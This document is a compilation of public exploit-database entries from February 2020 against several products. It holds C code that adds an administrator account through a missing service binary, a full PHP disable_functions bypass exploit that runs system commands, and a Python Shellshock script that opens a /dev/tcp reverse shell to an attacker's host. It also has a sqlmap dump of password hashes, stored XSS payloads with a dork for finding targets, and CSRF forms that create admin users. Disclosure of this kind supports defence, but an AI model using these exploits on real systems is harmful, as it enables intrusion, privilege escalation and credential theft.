# Date: 2020-02-13
# Vendor Homepage: https://veridium.net
# Software Link: https://veridium.net/files_u/spx/exe/SprintWork-Setup.exe
# Version: 2.3.1
# Tested On: Windows 10 (32-bit)
# Vulnerability Overview:
# SprintWork v2.3.1 (x86) suffers from insecure file & service & folder permissions, unquoted service paths,
# and a missing executable for one of the two Service it installs; to be ran as 'LocalSystem'.
# This allows any local user to gain persistent code-execution as 'LocalSystem'.
# Both the 32bit & 64bit build of SprintWork v2.3.1 create the services 'SP52 AMC' & 'SprintWork TM VI', with the "StartMode" set to 'Auto', to be ran as 'LocalSystem'; these services will ran every time the computer starts. The 'SP52 AMC' Service is set to use the 'nvlsimw.exe' file. On the 32bit version, the 'nvlsimw.exe' file is never created. This, in combination with its other vulnerabilities, results in persistent code-execution for any local user as 'LocalSystem'.
# See Proof of Concept below for full details.
# About:
# "SprintWork Distraction Blocker -- Block Social Networks and Games, Track Time Spent on Websites and Programs, Maximize Productivity
# + Block or time restrict social networks, online games or any website
# - Block web distractions including social media, addictive gaming websites, video streaming websites or any website wasting your time.
# + Block or time restrict games and programs
# - Usage of non-work related applications can be blocked or limited to certain times of day, days of week or restricted to a total amount of time per day.
# + Detailed activity monitoring and reporting
# - Records time spent actively using programs, total run time of each program and start and end times of usage sessions as well as details of visited websites including time and total duration of visits.
# + Selective user monitoring and blocking.
# - Can exclude certain computer users from blocking rules and monitoring of activity. Useful for shared and family computers.
# + Wildcard support
# - Block websites that have certain words in their addresses or block an entire domain or only a specific sub-domain.
# + Multiple website blocking lists.
# - Block or set time restrictions collectively for groups of websites.
# + Cannot be bypassed, deleted or disabled.
# - Works with all browsers and Internet clients and cannot be forcefully stopped, disabled or uninstalled unless the lock time you've chosen expires and only after you enter your password."
# - https://veridium.net/sprintwork/
## Service Information (there is also an Unquoted Service Path)
C:\>wmic service get name,pathname,startmode,StartName | findstr /v "C:\Windows" | findstr /i /c:Sprintwork
SP52 AMC C:\Program Files\SprintWork\nvlsimw.exe Auto LocalSystem
SprintWork TM VI C:\Program Files\SprintWork\nvlsim.exe Auto LocalSystem
## Missing Executable file 'nvlsimw.exe' for the 'SP52 AMC' service
C:\>dir "C:\Program Files\SprintWork\" | findstr /i /c:"exe"
11/23/2019 10:20 PM 1,345,536 NVLSIM.EXE
12/25/2019 02:47 PM 1,202,688 qcden.exe
12/25/2019 02:47 PM 14,436,864 SprintWork.exe
11/23/2019 10:20 PM 1,557,504 txew.exe
## Insecure Folder Permission
C:\>icacls "C:\Program Files\SprintWork"
C:\Program Files\SprintWork BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
## Insecure File/Service Permission
C:\>icacls "C:\Program Files\SprintWork\NVLSIM.EXE"
C:\Program Files\SprintWork\NVLSIM.EXE BUILTIN\Users:(I)(F)
## Local Privilege Escalation Proof of Concept
#0. Download & install SprintWork v2.3.1 (x86) on Windows 10 32bit Operating System
#1. Create low privileged user
C:\Windows\system32>net user lowpriv password /add
#2. Change to lowpriv User
C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"
User name lowPrivUser
Local Group Memberships *Users
Global Group memberships *None
C:\>whoami
mycomputer\lowprivuser
#3. Create malicious binary on Kali Linux
3.1) Download dependencies
root@kali# apt install gcc-mingw-w64-i686 wine64 -y
3.2) Create Add Admin User C Code
root@kali# cat addAdmin.c
#include<windows.h>
int main(void){
system("net user adminpriv mypassword /add");
system("net localgroup Administrators adminpriv /add");
return 0;
}
3.3) Compile Code
root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o nvlsimw.exe
#4. Transfer created 'nvlsimw.exe' to the Windows Host
#5. Move the created 'nvlsimw.exe' binary to the 'C:\Program Files\SprintWorks\' Directory
C:\Users\lowpriv>move nvlsimw.exe "C:\Program Files\SprintWork\"
1 file(s) moved.
C:\Users\lowpriv>dir "C:\Program Files\SprintWork\" | findstr /i /c:nvlsim
11/23/2019 10:20 PM 1,345,536 NVLSIM.EXE
02/13/2020 06:07 PM 288,469 nvlsimw.exe
#6. Verify localgroup 'Administrators' members
C:\Users\lowpriv>net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
boku
#6. Reboot the Computer
C:\Users\lowpriv>shutdown /r /t 0
#7. Verify user 'adminpriv' was created & added to the localgroup 'Administrators'
C:\>net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
adminpriv
boku
C:\>net user adminpriv | findstr /C:"User name" /C:active /C:Password /C:Group
User name adminpriv
Account active Yes
Password last set ?2/?13/?2020 6:18:03 PM
Password expires Never
Password changeable ?2/?13/?2020 6:18:03 PM
Password required Yes
Local Group Memberships *Administrators *Users
Global Group memberships *None
# Exploit Title: HomeGuard Pro 9.3.1 - Insecure Folder Permissions
# Exploit Author: boku
# Date: 2020-02-13
# Vendor Homepage: https://veridium.net
# Software Link: https://veridium.net/files_u/hg-pro/exe/HomeGuardPro-Setup.exe
# Version 9.3.1
# Tested On: Windows 10 (32-bit)
# HomeGuard Pro v9.3.1 - Unquoted Service Path + Insecure Folder/File/Service Permissions
## Service Information (Unquoted Service Path)
C:\>wmic service get Name,PathName,StartMode,StartName | findstr /v "C:\Windows" | findstr /i /v """
Name PathName StartMode StartName
HG52 AM VI C:\Program Files\HomeGuard Pro\vglset.exe Auto LocalSystem
HG52 AMC C:\Program Files\HomeGuard Pro\vglsetw.exe Auto LocalSystem
HG52 AM REM C:\Program Files\HomeGuard Pro\vglrem.exe Auto LocalSystem
HG52 AM SRV C:\Program Files\HomeGuard Pro\vglserv.exe Auto LocalSystem
## Insecure Folder Permission
C:\>icacls "C:\Program Files\HomeGuard Pro" | findstr /i "Users"
C:\Program Files\HomeGuard Pro BUILTIN\Users:(F)
## Insecure File/Service Permission
C:\>icacls "C:\Program Files\HomeGuard Pro\VGL*" | findstr /i "Users"
C:\Program Files\HomeGuard Pro\vglrem.exe BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\VGLSERV.EXE BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\vglset.exe BUILTIN\Users:(I)(F)
C:\Program Files\HomeGuard Pro\vglsetw.exe BUILTIN\Users:(I)(F)
<?php
# PHP 7.0-7.4 disable_functions bypass PoC (*nix only)
#
# Bug: https://bugs.php.net/bug.php?id=76047
# debug_backtrace() returns a reference to a variable
# that has been destroyed, causing a UAF vulnerability.
#
# This exploit should work on all PHP 7.0-7.4 versions
# released as of 30/01/2020.
#
# Author: https://github.com/mm0r1
pwn("uname -a");
function pwn($cmd) {
global $abc, $helper, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace(); # ;)
if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
$backtrace = debug_backtrace();
}
}
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = chr($v & 0xff);
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
# handle pie
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'constant' constant check
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
# 'bin2hex' constant check
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if($leak == 0x10102464c457f) { # ELF header
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if($f_name == 0x6d6574737973) { # system
return leak($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
function trigger_uaf($arg) {
# str_shuffle prevents opcache string interning
$arg = str_shuffle(str_repeat('A', 79));
$vuln = new Vuln();
$vuln->a = $arg;
}
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$n_alloc = 10; # increase this value if UAF fails
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle(str_repeat('A', 79));
trigger_uaf('x');
$abc = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) { };
if(strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
# leaks
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
# fake value
write($abc, 0x60, 2);
write($abc, 0x70, 6);
# fake reference
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
# fake closure object
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
# pwn
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4); # internal func type
write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
($helper->b)($cmd);
exit();
}
# Exploit Title: SOPlanning 1.45 - 'by' SQL Injection
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://www.soplanning.org/en/
# Software Link: https://sourceforge.net/projects/soplanning/files/soplanning/
# Version 1.45
# Tested on Windows 10/Kali Rolling
# The SOPlanning application is vulnerable to SQL Injection in the OrderBy clause of the sort on the Projects page:
# POC:
# The SOPlanning 1.45 application is vulnerable to SQL Injection which can be leveraged into getting the information for the users table.
# Capture the request in Burpsuite:
GET /soplanning/www/projets.php?order=nom_createur&by=ASC HTTP/1.1
Host: HOSTNAME
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://HOST/soplanning/www/projets.php?order=charge&by=ASC
Connection: close
Cookie: xposMois=0; dateDebut=14/02/2020; dateFin=14/04/2020; xposMoisWin=0; xposJoursWin=0; xposJours=0; yposMoisWin=0; yposMois=0; yposJoursWin=0; yposJours=0; PHPSESSID=0srffkdt9nu2jis443pp9nh3i9; soplanningplanning_=pnljrmetd5cse4d8dm1f09fn0u; baseLigne=users; baseColonne=jours; statut_projet=%5B%22abandon%22%2C%22archive%22%2C%22a_faire%22%2C%22en_cours%22%2C%22fait%22%5D
Upgrade-Insecure-Requests: 1
# Feed the request into SQLMap:
sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump
Then you will be able to see the information for the users in the database:
root@kali:~/SOPlanning# sqlmap -r projects.req --level=5 --risk=3 -p by --dbms=mysql -D soplanning -T planning_user --dump
___
__H__
___ ___[(]_____ ___ ___ {1.4.1.2#dev}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:13:27 /2020-02-14/
[11:13:27] [INFO] parsing HTTP request from 'projects.req'
[11:13:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: by (GET)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
Payload: order=nom_createur&by=ASC,(SELECT (CASE WHEN (6871=6871) THEN 1 ELSE 6871*(SELECT 6871 FROM INFORMATION_SCHEMA.PLUGINS) END))
Type: time-based blind
Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: order=nom_createur&by=ASC PROCEDURE ANALYSE(EXTRACTVALUE(9535,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x77464654))))),1)
---
Because it's time based it will take a while to retrieve the user details, but you will retrieve password hashes.
# Exploit Title: Avaya Aura Communication Manager 5.2 - Remote Code Execution
# Exploit Author: Sarang Tumne a.k.a SarT
# Date: 2020-02-14
# Confirmed on release 5.2
# Vendor: https://www.avaya.com/en/
# Avaya's advisory:
# https://downloads.avaya.com/css/P8/documents/100183151
# Exploit generates a reverse shell to a nc listener (Shellshock Exploit)
###############################################
#!/usr/bin/python
import sys
import requests
if len(sys.argv) < 4:
print "\n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit"
print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>"
print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337"
print "[*] Netcat Listener: nc -lvvnp <port>"
print "\n"
sys.exit()
#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings()
CM = sys.argv[1]
url = "https://" + CM + "/mt/mt.cgi"
attacker_ip = sys.argv[2]
rev_port = sys.argv[3]
http_headers = {
"User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1'
}
def main():
if len(sys.argv) == 4:
print "[+] Success, spawning a shell on your custom port :)..."
requests.get(url, headers=http_headers, verify=False, timeout=5)
else:
print "[-] Something went wrong, quitting..."
sys.exit()
if __name__ == "__main__":
main()
# Exploit Title: Wordpress Plugin Strong Testimonials 2.40.0 - Persistent Cross-Site Scripting
# Date: 2020-01-23
# Vendor Homepage: https://strongtestimonials.com
# Vendor Changelog: https://github.com/MachoThemes/strong-testimonials/blob/master/changelog.txt
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-strong-testimonials-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 2.40.0 and below
# CVE : CVE-2020-8549
# 1. Description
# Strong Testimonials is a popular and easily customizable WordPress testimonial plugin with
# over 90,000 active installations. In the client details section which is seen when adding
# or editing a testimonial, the custom[client_name] and custom[company_name] parameters
# were found to be vulnerable to stored cross-site scripting. All WordPress websites
# using Strong Testimonials version 2.40.0 and below are affected.
2. Proof of Concept
When the testimonial is added to a page on the site, the XSS payload passed in both of the above mentioned vulnerable parameters get executed.
The payload in custom[client_name] also gets executed in the All Testimonials (/wp-admin/edit.php?post_type=wpm-testimonial) page.
POST /wp-admin/post.php HTTP/1.1
Host: testing.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://testing.com/wp-admin/post.php?post=24879&action=edit
Content-Type: application/x-www-form-urlencoded
Content-Length: 1402
Origin: http://testing.com
Connection: close
Cookie: wordpress_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7Cbf600418ab822f99fc55eb651acb102beaa01b055292c0f9d84667c7b490c60c; wp-saving-post=24879-check; wordpress_cf_adm_use_adm=1; wp-settings-time-1=1581780228; PHPSESSID=aeb50c30210014eec857909f45b3fbf3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_f5085b107e100d9e2687f38209d91671=jinson%7C1582988788%7CQJZkFRVzEdZRVbgZsiJIXldlEPTlfFOij2iybAHoVe6%7C376e10c1fa5aeea389a485d0475f4c7dfe659f41d3b21f1b0bf6435838c003c5; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg
Upgrade-Insecure-Requests: 1
_wpnonce=001abb6a10&_wp_http_referer=%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=wpm-testimonial&original_post_status=publish&referredby=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Ftesting.com%2Fwp-admin%2Fpost.php%3Fpost%3D24879%26action%3Dedit&post_ID=24879&meta-box-order-nonce=b39d630598&closedpostboxesnonce=6436439491&original_post_title=XSS+Test&post_title=XSS+Test&samplepermalinknonce=d93284f5e5&content=&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=01&jj=22&aa=2020&hh=18&mn=02&ss=28&hidden_mm=01&cur_mm=02&hidden_jj=22&cur_jj=15&hidden_aa=2020&cur_aa=2020&hidden_hh=18&cur_hh=15&hidden_mn=02&cur_mn=23&original_publish=Update&save=Update&tax_input%5Bwpm-testimonial-category%5D%5B%5D=0&newwpm-testimonial-category=New+Category+Name&newwpm-testimonial-category_parent=-1&_ajax_nonce-add-wpm-testimonial-category=f7661627a5&menu_order=0&_thumbnail_id=-1&custom%5Bclient_name%5D=%3Cscript%3Ealert%28%27all+testimonials+page%27%29%3C%2Fscript%3E&custom%5Bemail%5D=&custom%5Bcompany_name%5D=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&custom%5Bcompany_website%5D=&custom%5Bnofollow%5D=default&excerpt=&post_name=creator
3. Timeline
Vulnerability reported to the Strong Testimonials team – January 23, 2020
Strong Testimonials version 2.40.1 containing the fix released – January 25, 2020
# Exploit Title: HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-02-14
# Vendor Homepage:https://www8.hp.com/mx/es/home.html
# Software Link:ftp://ftp.hp.com/pub/softpaq/sp70001-70500/sp70439.exe
# HP Development Company, L.P.
# Tested Version: 1.2.9.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Home x64 en
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "HP" | findstr /i /v """
HPWMISVC HPWMISVC C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe Auto
C:\>sc qc HPWMISVC
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: HPWMISVC
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HPWMISVC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>
# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system
# root path undetected by the OS or other security applications where it could potentially be
# executed during application startup or reboot. If successful, the local user's code would
# execute with the elevated privileges of the application.
# Exploit Title: BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-02-10
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe
# Version: 2.0.1214
# Tested On: Windows 10 (32-bit)
C:\Users\user>wmic service get name, pathname, startmode | findstr "BOOTP" | findstr /i /v """
BOOTP Turbo C:\Program Files\BOOTP Turbo\bootpt.exe Auto
C:\Users\user>sc qc "BOOTP Turbo"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: BOOTP Turbo
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\BOOTP Turbo\bootpt.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BOOTP Turbo
DEPENDENCIES : Nsi
: Afd
: NetBT
: Tcpip
SERVICE_START_NAME : LocalSystem
# Exploit Title: MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation
# Author: nu11secur1ty
# Date: 2020-02-14
# Vendor: Microsoft
# Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty
# CVE: CVE-2020-0683
[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source: readme from GitHUB
[+] twitter.com/nu11secur1ty
[Exploit Program]
Link:
https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0683/nu11secur1ty
[Vendor]
Microsoft
[Vulnerability Type]
Windows Installer Elevation of Privilege Vulnerability
[CVE Reference]
An elevation of privilege vulnerability exists in the Windows Installer
when MSI packages process symbolic links. An attacker who successfully
exploited this vulnerability could bypass access restrictions to add or
remove files.
To exploit this vulnerability, an attacker would first have to log on to
the system. An attacker could then run a specially crafted application that
could exploit the vulnerability and add or remove files.
The security update addresses the vulnerability by modifying how to reparse
points are handled by the Windows Installer.
[Security Issue]
Elevation of Privilege from user to C:\Windows\administartion execution
files
[References]
# CVE-2020-0683
Original Poc sent to MSRC.
Assigned to CVE-2020-0683 - Windows Installer Elevation of Privilege
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0683
Source code for Visual Studio C++ 2019
Inside "nu11secur1ty" you'll find the exploit (exe) to execute.
# Note:
This test is using `system.ini` in c:\Windows\system.ini
When you exploit this file you should replace with the original file
`system.ini` after this test, which you will find in CVE-2020-0683
directory :)
--------------------------------------------------------------------------
- - How to run the exploit
Go into "nu11secur1ty" directory and from a cmd console launch:
- for the test
MsiExploit.exe c:\Windows\system.ini"
Be sure that both "MsiExploit.exe" and "foo.msi" reside in the same directory.
- Disclaimer:
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.
- @nu11secur1ty
[Network Access]
Local
[Disclosure Timeline]
02/11/2020
[Disclaimer]
The entry creation date may reflect when the CVE ID was allocated or
reserved, and does not necessarily indicate when this vulnerability
was discovered, shared with the affected vendor, publicly disclosed,
or updated in CVE.
nu11secur1ty
--
# Exploit Title: Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User)
# Date: 2020-02-14
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://icehrm.com/
# Software Link: https://sourceforge.net/projects/icehrm/#Version 26.2.0
# Tested on Windows 10/Kali Rolling
# The Ice HRM Web Application is vulnerable to CSRF that leads to arbitrary user creation or password change:
# POC for user creation:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://HOSTHERE/icehrm/app/service.php">
<input type="hidden" name="t" value="User" />
<input type="hidden" name="a" value="ca" />
<input type="hidden" name="sa" value="saveUser" />
<input type="hidden" name="mod" value="admin=users" />
<input type="hidden" name="req" value="{"username":"test","email":"test@test.com","employee":"1","user_level":"Admin","user_roles":"[\"2\"]","lang":"NULL","default_module":"NULL","csrf":"c0bdded55472fab56c578386143a1854e6f8dd11"}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# POC for Password Change:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://HOSTHERE/icehrm/app/service.php">
<input type="hidden" name="t" value="User" />
<input type="hidden" name="a" value="ca" />
<input type="hidden" name="sa" value="changePassword" />
<input type="hidden" name="mod" value="admin=users" />
<input type="hidden" name="req" value="{"id":1,"pwd":"admin123"}" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
# Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply"
# Date: 2020-02-14
# Category : Webapps
# Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip
# Vendor Homepage: https://github.com/Fruitfulcode/Fruitful
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
# Team Members: Behzad Khalifeh , Milad Ranjbar
# Version: 3.8
# Tested on: Windows/Linux
# CVE: N/A
.:: Theme Description ::.
Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design.
.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target With above Dork.
Step 2 - Inject Your Java Script Codes to Name & Email Fields
Step 3 - Click Post Comment
.:: Tested Payload ::.
'>"><script>alert(/XSS By UltraSecurity/)</script>
.:: Post Request ::.
comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145